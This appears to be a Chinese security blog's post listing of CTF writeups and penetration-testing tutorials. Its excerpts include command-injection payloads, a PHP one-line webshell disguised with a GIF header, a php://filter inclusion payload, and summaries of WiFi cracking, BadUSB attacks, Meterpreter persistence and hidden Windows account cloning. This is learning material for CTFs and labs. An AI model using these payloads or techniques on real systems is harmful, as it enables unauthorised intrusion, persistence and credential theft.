Web安全
Web安全
你们这样一点都不可耐
CTF小白,信安菜鸡
展开
-
【Bugku】秋名山老司机 详细题解 Writeup
import requestsimport reurl = 'http://123.206.87.240:8002/qiumingshan/'s = requests.Session()req = s.get(url)expression = re.search(r'(\d+[+\-*])+(\d+)', req.text).group()# expression = req.text[req.text.find('<div>')+5:req.text.find('=?')]re原创 2020-11-24 19:36:52 · 1315 阅读 · 2 评论 -
小黑客,2020还没有邀请码注册 hackthebox ?reCAPTCHA验证码加载不出来?
访问邀请码页面https://www.hackthebox.eu/invite F12控制台输入$.post('https://www.hackthebox.eu/api/invite/generate',function(data){console.log(data)})点开出现的数据提交 xxxxxx= 经过base64解码后的字符串开始注册The g-recaptcha-response field is required.使用了谷歌的reCAPTCHA验证码,在国内不能原创 2020-10-07 21:37:49 · 4689 阅读 · 2 评论 -
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换0x00 考点1、命令绕过空格方法有:$IFS$1、${IFS}$1、 {IFS}、IFS2、内联执行内联,就是将反引号内命令的输出作为输入执行?ip=127.0.0.1;cat$IFS$9`ls`$IFS在Li原创 2020-08-29 17:26:25 · 9618 阅读 · 21 评论 -
【BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup
【BUUCTF】[极客大挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题0x00 考点目录扫描源码泄露反序列化0x01 解题dirsearch-u 指定url-e 指定网站语言-w 可以加上自己的字典(加上路径)-r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用)python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn原创 2020-08-26 22:48:58 · 1953 阅读 · 0 评论 -
【BUUCTF】[极客大挑战 2019] Upload Writeup
【BUUCTF】[极客大挑战 2019] Upload Writeup0x00 考点文件上传绕过可解析的php后缀名:0x01 解题0x00 考点文件上传绕过带图片头的php一句话木马可解析的php后缀名:php3,php4,php5,pht,phtml,phps,pht,phtm0x01 解题要求必须上传图片带gif图片头的php一句话木马GIF89a? <script language="php">eval($_REQUEST[a])</script&g原创 2020-08-26 15:55:53 · 680 阅读 · 1 评论 -
【BUUCTF】 [极客大挑战 2019] Http Writeup —— CTFer必须要会的几种请求头添加方式
【BUUCTF】 [极客大挑战 2019] Http Writeup0x00 考点请求头请求头添加的方式0x01 解题1、ModHeader2、Hackbar3、Burp Suite操作内容总结)0x00 考点请求头User-Agent:用什么游览器访问Referer :当前页面是通过此来源页面里的链接进入的X-Forwarded-For:获取最初发起请求客户端的IP地址请求头添加的方式HackbarModHeaderBurp Suite游览器 手动加cookie0x01原创 2020-08-24 12:21:46 · 733 阅读 · 12 评论 -
新版抓包神器 Burp Suite 2020 找不到 spider模块?
0x00 官方说明在官网文档https://portswigger.net/support/burp-suite-tools点击Scanner 和Spider 出现的页面都是相同的https://portswigger.net/burp/documentation/desktop/scanningScanner 原先主要作用是扫描web漏洞0x01 简单看看0x03 Spider 使用教程比如我找网站的bak文件需要一段时间,把整个目录都爬下来,非常直观0x02 Scan原创 2020-08-24 10:09:01 · 10756 阅读 · 2 评论 -
dirmap + dirsearch 安装和使用教程
0x00 安装运行报错一个一个模块安装很麻烦,看看dirmap给的requirement.txtgeventrequestsprogressbar2lxml直接pip3 install -r requirement.txt愉快的开始0x01 使用原创 2020-08-23 22:48:33 · 8809 阅读 · 1 评论 -
【BUUCTF】[ACTF2020 新生赛] BackupFile Writeup
@TOC0x00 知识点0x01 解题原创 2020-08-23 22:03:16 · 900 阅读 · 1 评论 -
【BUUCTF】[ACTF2020 新生赛]Exec Writeup
|cat /flag标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}原创 2020-08-23 12:27:30 · 1417 阅读 · 3 评论 -
【BUUCTF】[极客大挑战 2019]Knife Writeup
flag{bbfff7f8-7c63-4dc2-bd28-64a75585d2cf}原创 2020-08-23 11:14:05 · 397 阅读 · 0 评论 -
【BUUCTF】[ACTF2020 新生赛] IncludeWriteup
【BUUCTF】[ACTF2020 新生赛]Include0x00 知识点0x01 解题![在这里插入图片描述](https://img-blog.csdnimg.cn/20200822234622599.png#pic_center)0x00 知识点0x01 解题?file=php://filter/read=convert.base64-encode/resource=flag.phpPD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOw原创 2020-08-22 23:48:30 · 1481 阅读 · 0 评论 -
【BUUCTF】[极客大挑战 2019] Secret File Writeup
<html> <title>secret</title> <meta charset="UTF-8"><?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stris...原创 2020-08-22 23:17:54 · 707 阅读 · 0 评论 -
木马
图片马cmd命令行copy 1.png/b + 2.php/a 3.png/b:二进制文件 /a:ASCII文件3.png生成文件名原创 2020-08-14 21:27:46 · 169 阅读 · 0 评论 -
Hackbar 免费下载+使用指南
Ctrl+Enter 执行原创 2020-08-14 18:35:31 · 18916 阅读 · 16 评论 -
【BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
【BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s原创 2020-08-13 16:15:46 · 1985 阅读 · 0 评论 -
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
find the flag<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; .原创 2020-05-10 20:32:24 · 4519 阅读 · 8 评论 -
【BUUCTF】[网鼎杯 2018]Fakebook
工具扫描,发现有/user.php.bak下载下来<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->n...原创 2020-05-06 14:18:18 · 784 阅读 · 0 评论 -
【BUUCTF】[HCTF 2018]admin——一上手flag就出现让我有措手不及,意犹未尽
选择login输入admin/123真的,就这样,结束了??yepflag{4e012e7f-7aa1-4ebf-ace7-51f7d70ee36a}原创 2020-05-05 21:02:27 · 432 阅读 · 0 评论 -
【攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP
原创 2020-05-04 17:38:42 · 690 阅读 · 2 评论 -
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑
<!Doctype html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript"> Array.prototype.contains = funct...原创 2020-05-03 18:46:03 · 516 阅读 · 0 评论 -
文件上传漏洞 大总结
1.1 前端JavaScript检测 2.1 后端检测文件类型 2.1.1 检测content-type 2.1.2 检测文件头判断文件类型 2.2 后端检测文件扩展名 2.2.1 黑名单检测 2.2.2 白名单检测 2.3 后端检测文件内容 2.3....转载 2020-05-01 23:46:38 · 579 阅读 · 0 评论 -
文件包含漏洞总结
文件包含(File Inclusion)顾名思义就是让代码去包含一个文件,其实就是在编写代码时“引用”其他文件的代码。以PHP为例,php的文件包含相关函数都是无论其参数的扩展名是什么,都会将其内容作为php代码解析,这可能就会造成任意的php代码执行。如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就很可能使攻击者利用该功能进行文件包含漏洞的攻...转载 2020-04-27 20:26:20 · 648 阅读 · 0 评论 -
渗透大神教你用kali向心爱的妹子表白
教你如何向嫂子表白,来看看大神如何告诉你!一:在root目录下新建个txt文档,用vim编辑文档,写几段暧昧的话(写不出百度吧!)二:终端执行命令:命令1:先开启网卡监听模式airmon-ng start wlan0命令2:开启无线广播mdk3 wlan0mon b -f /root/jj.txt -c 6 -s 1000版权属于:逍遥子本文链接:htt...转载 2020-04-27 12:49:13 · 1106 阅读 · 0 评论 -
谁动了我的奶酪——USB-Usbrip使用教程
Usbrip(源自“USB Ripper”,而不是“USB RIP”惊人)是一个开源取证工具,带有CLI界面,可让您跟踪USB设备工件(即USB事件历史记录,“已连接”和“已断开连接”事件) Linux机器。安装我们利用pip安装即可!pip install usbripBash 复制示例usbrip events history -ql -n 100B...转载 2020-04-27 12:18:33 · 352 阅读 · 0 评论 -
msfconsole从入门到放弃
关于msfconsolemsfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器,今天我们在一起来回顾下吧。msfconsole.jpg启动在终端执行service postgresql start #启动postgresql 不启动也可以msfconsoleBash 复制msfconsole...转载 2020-04-27 12:16:51 · 3458 阅读 · 1 评论 -
持久ing+
持久化在msf生成的shell中,无论是是android还是windows在关闭软件或者设备重启后,我们的会话进程都会自然而然的关闭。要想得到会话,必须用户再次启动我们的shell才能得到会话。那么,我们该如何解决这一问题呢?持久化msf/Windows持久化1、metsvc:通过服务启动,是 Meterpreter 下的一个脚本;运行 run mets...转载 2020-04-27 12:14:34 · 379 阅读 · 0 评论 -
kali linux WiFi钓鱼
一:运行wifipumpkin终端命令wifi-pumpkinQQ截图20180507082941.png二:发射钓鱼AP点击界面中的设置,设置钓鱼AP和密码,点击start即可开始QQ截图20180507083309.png点击start后我们可以看到钓鱼WiFi已经开启。连接钓鱼wifi在home界面可以看到当前连接的设备。QQ截图201805070...转载 2020-04-27 11:59:33 · 3752 阅读 · 3 评论 -
badusb攻击windows10(msfconsole版)
准备badusbArduino下载软件点击下载运行软件TIM截图20190305105048.png在工具菜单中 选择,选择badusb的端口和开发版。TIM截图20190304122136.png注入代码windows10系统#include <Keyboard.h>void setup() {Keyboard.begin();//开始...转载 2020-04-27 11:57:05 · 1446 阅读 · 0 评论 -
【pikachu渗透靶场&Web安全从入门到放弃】之 CSRF 跨站请求伪造漏洞
原创 2020-04-27 10:27:01 · 308 阅读 · 0 评论 -
【pikachu渗透靶场&Web安全从入门到放弃】之 XSS 跨站脚本漏洞
原创 2020-04-27 10:03:02 · 178 阅读 · 0 评论 -
【pikachu渗透靶场&Web安全从入门到放弃】之 暴力破解 绕过验证码
原创 2020-04-26 15:52:46 · 256 阅读 · 0 评论 -
无线安全之破解WPA/WPA2 加密WiFi
image 由于古老的WPE加密的WiFi已经几乎没有了,所以这里我就不去细说如何破解WPE加密的WiFi了。今天就来聊聊 如何来使用Kali Linux来破解Wpa/Wpa2加密的WiFi。本次破解WiFi使用的是Kali Linux下经典的aircrack-ng准备可以使用无线网络的Kali Linux由于古老的WPE加密的Wi...转载 2020-04-21 22:31:07 · 2527 阅读 · 0 评论 -
10种常见姿势带你——找回重置用户密码
<div class="article-tag"> <a href="/tags/Steago/"> <...转载 2020-04-21 20:49:48 · 3987 阅读 · 0 评论 -
kali 输入密码登陆后黑屏,左上角只有一个下划线 _ 在一闪一闪亮晶晶???
Ctrl + alt + F2 进命令行登录窗口apt-get upgrade 根据说明来排查故障或者执行dpkg --configure -a实在不行就重新再来吧(取证过程中重启kali黑屏让我—>>>人生不得不重新来过...原创 2020-04-21 14:03:52 · 1440 阅读 · 0 评论 -
【Kali Linux 2020.1b】 全网 最新 安装 教程 ——你会踩到的坑,遇到的问题,难以哭诉的崩溃
有很人多说:本人擅长Ai、Fw、Fl、Br、Ae、Pr、Id、Ps等软件的安装与卸载,精通CSS、JavaScript、PHP、ASP、C、C++、C#、Java、Ruby、Perl、Lisp、python、Objective-C、ActionScript、Pascal、spss、sas等单词的拼写,熟悉Windows、Linux、Mac、Android、IOS、WP8等系统的开关机。但是没...原创 2020-04-20 15:50:53 · 4121 阅读 · 18 评论 -
【HackPack CTF】 WEB Treasure Map
【HackPack CTF】 WEB Treasure Maphttps://treasure-map.cha.hackpack.club/先演示错误思路:Plan A. 0~9999,一共1w个目录,每个看一下,不久找到宝藏了吗?上bp抓包,Ctrl + I,爆破点为/后的数字比如1,sniper狙击手模式,playload 用runtime ...原创 2020-04-19 19:03:48 · 824 阅读 · 0 评论 -
Hashcat 爆破Linux密码使用工具
Jul 20, 2016 Hashcat 爆破Linux密码使用工具 今天拿了个linux的主机,提下来了,以前提成root之后就没深入过,这次想着先把root密码破解出来; 以前交洞的时候只是单纯证明存在/etc/passwd和/etc/shadow,但从没管过里面的hash; 看网上教程也很多,我也记录一下; 都知道linux系统中有一个用户密码配置文件 /etc/shadow ,里面...转载 2020-04-18 21:50:47 · 4458 阅读 · 1 评论 -
AWD 比赛小技巧 & 套路总结
AWD 比赛小技巧 & 套路总结 AWD 类型的线下赛我觉着靠的是平时积累的技巧和万年的手速(脚本),见的多了碰到问题应付起来就会容易些; 网上也有好多师傅们写的技巧,文末附上链接; 这篇临时写给某位伙计; List 1、备份。源码以及数据库,可以备份到隐蔽的目录(.xx)下,顺便down到本地(Win下:Winscp,FileZilla;Mac:scp,Transmit..); 2...转载 2020-04-18 21:46:01 · 3935 阅读 · 0 评论 -
Windows实现克隆隐身用户的 "芝士"
Windows完美实现克隆用户的方法实现步骤1、新建$隐藏用户,net user发现其被隐藏,但从计算机管理中可以看到其并未隐藏。2、将reg SAM目录赋予administrator用户读和写权限;3、查看administrator用户对应的hex;4、将administrator用户对应的hex目录里F字段内容复制;5、同样的,找到新建隐藏用户指向的hex目录,将上一步复制...转载 2020-04-18 21:24:18 · 256 阅读 · 0 评论